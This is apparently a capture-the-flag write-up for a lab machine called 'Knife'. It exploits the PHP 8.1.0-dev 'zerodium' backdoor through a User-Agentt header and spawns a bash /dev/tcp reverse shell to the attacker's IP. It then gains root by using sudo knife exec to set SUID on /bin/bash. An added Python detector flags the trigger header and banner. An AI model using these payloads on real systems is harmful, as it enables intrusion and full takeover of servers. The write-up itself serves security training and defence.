# Knife

## Port scan

```
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

### Website

![](https://user-images.githubusercontent.com/53917092/119241635-4f676d00-bb2e-11eb-9544-c34da9caa846.png)

Looking at the site, we don't see anything interesting.

I tried fuzzing around to find more information but found nothing.

So I decided to look at the requests.

Request:

```
GET /index.php HTTP/1.1
Host: 10.129.109.116
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```

Response:

```
HTTP/1.1 200 OK
Date: Sat, 22 May 2021 21:45:40 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Vary: Accept-Encoding
Content-Length: 5815
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" >
[...]
```

Here we have something interesting: the server is running PHP 8.1.0-dev.

```
X-Powered-By: PHP/8.1.0-dev
```

Searching for PHP 8.1.0-dev vulnerabilities:

![](https://user-images.githubusercontent.com/53917092/119243186-e63a2680-bb3a-11eb-95eb-2ef78be1607f.png)

<https://www.h3c.com/cn/d_202104/1397014_30003_0.htm>

After translating this site, we see that a backdoor was placed in this specific version of PHP (the backdoor was quickly removed in later updates).

![](https://user-images.githubusercontent.com/53917092/119243233-3fa25580-bb3b-11eb-8f49-edb98ea617fd.png)

Searching further about the backdoor, I found this:

![](https://user-images.githubusercontent.com/53917092/119243441-24384a00-bb3d-11eb-984e-06dfe77bdf55.png)

<https://blog.csdn.net/zy15667076526/article/details/116447864>

This article explains how to use the backdoor to execute code and obtain RCE.

![](https://user-images.githubusercontent.com/53917092/119243476-898c3b00-bb3d-11eb-9045-41031df63283.png)

By adding a `User-Agentt` header whose value starts with `zerodium`, the PHP code that follows the trigger word gets executed.

So our request will be:

```
GET /index.php HTTP/1.1
Host: 10.129.109.116
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
User-Agentt: zerodiumsystem('id');
```

And we get the response:

```
HTTP/1.1 200 OK
Date: Sat, 22 May 2021 23:43:40 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Vary: Accept-Encoding
Content-Length: 5866
Connection: close
Content-Type: text/html; charset=UTF-8

uid=1000(james) gid=1000(james) groups=1000(james)
<!DOCTYPE html>
[...]
```

It worked: we have remote code execution.
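As an added defensive example (not part of the original writeup), the following Python flags traffic matching what is shown above: requests carrying a `User-Agentt` header that contains the `zerodium` trigger word, and responses whose `X-Powered-By` banner advertises the backdoored `PHP/8.1.0-dev` build. The sample messages are constructed, modelled on the captures above.

```python
"""Flag the PHP 8.1.0-dev 'zerodium' backdoor trigger and banner in raw HTTP messages."""
from typing import Dict, List, Tuple

TRIGGER_HEADER = "user-agentt"        # the misspelled header the backdoor inspects
TRIGGER_WORD = "zerodium"             # marker word that activates code execution
BACKDOORED_BANNER = "PHP/8.1.0-dev"   # X-Powered-By value seen in the response above


def parse_http(raw: str) -> Tuple[str, Dict[str, str]]:
    """Split a raw HTTP message into its start line and a lowercase-keyed header map."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def request_triggers_backdoor(raw_request: str) -> bool:
    """True if the request carries a User-Agentt header containing 'zerodium'."""
    _, headers = parse_http(raw_request)
    return TRIGGER_WORD in headers.get(TRIGGER_HEADER, "").lower()


def response_advertises_backdoored_php(raw_response: str) -> bool:
    """True if the response banner identifies the backdoored PHP build."""
    _, headers = parse_http(raw_response)
    return headers.get("x-powered-by", "") == BACKDOORED_BANNER


def triage(raw_request: str, raw_response: str) -> List[str]:
    """Return a list of findings for one request/response pair (empty if clean)."""
    findings = []
    if request_triggers_backdoor(raw_request):
        findings.append("backdoor trigger header in request")
    if response_advertises_backdoored_php(raw_response):
        findings.append("backdoored PHP build advertised in response")
    return findings


# Constructed samples modelled on the exchange above (not captured traffic).
BENIGN_REQUEST = "GET /index.php HTTP/1.1\r\nHost: example.test\r\nUser-Agent: Mozilla/5.0\r\n\r\n"
SUSPICIOUS_REQUEST = ("GET /index.php HTTP/1.1\r\nHost: example.test\r\n"
                      "User-Agent: Mozilla/5.0\r\nUser-Agentt: zerodiumsystem('id');\r\n\r\n")
RESPONSE = "HTTP/1.1 200 OK\r\nServer: Apache/2.4.41 (Ubuntu)\r\nX-Powered-By: PHP/8.1.0-dev\r\n\r\n<html>"

if __name__ == "__main__":
    print(triage(SUSPICIOUS_REQUEST, RESPONSE))
```

Header names are matched case-insensitively because PHP normalises them before the backdoor reads the value, so a `user-agentt` spelling is caught too.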

## User

Open a listener:

> nc -lvnp 1234

Use this header:

```
User-Agentt: zerodiumsystem('bash -c "/bin/sh -i >& /dev/tcp/10.10.14.96/1234 0>&1" ');
```

We got a shell:

![](https://user-images.githubusercontent.com/53917092/119244395-af6a0d80-bb46-11eb-8e5e-97de3c96a7f8.png)

Upgrading this shell to a full TTY:

```
python3 -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo; fg
export TERM=xterm
clear
```

![](https://user-images.githubusercontent.com/53917092/119244469-71211e00-bb47-11eb-98f2-7db79fcdb7ef.png)

## Privilege Escalation

> sudo -l

![](https://user-images.githubusercontent.com/53917092/119245373-463ac800-bb4f-11eb-8461-e38d224d9c8f.png)

Let's check this binary:

> cat /usr/bin/knife

![](https://user-images.githubusercontent.com/53917092/119245628-24424500-bb51-11eb-8257-6cca1c443084.png)

It looks like a management program written in Ruby.

Running this binary:

> /usr/bin/knife

we see that it can run commands:

![image](https://user-images.githubusercontent.com/53917092/119246545-d6313f80-bb58-11eb-94cf-dbcac889a9ec.png)

I wrote a script that runs a command to set the SUID bit on bash, so that bash can be run as root without a password:

```
echo '`chmod +s /bin/bash`' > rootscript
sudo /usr/bin/knife exec rootscript
```

Now run bash with the `-p` flag:

> bash -p

We got root; just grab the root flag.

![image](https://user-images.githubusercontent.com/53917092/119246975-64f38b80-bb5c-11eb-9613-dfc8f4faed98.png)
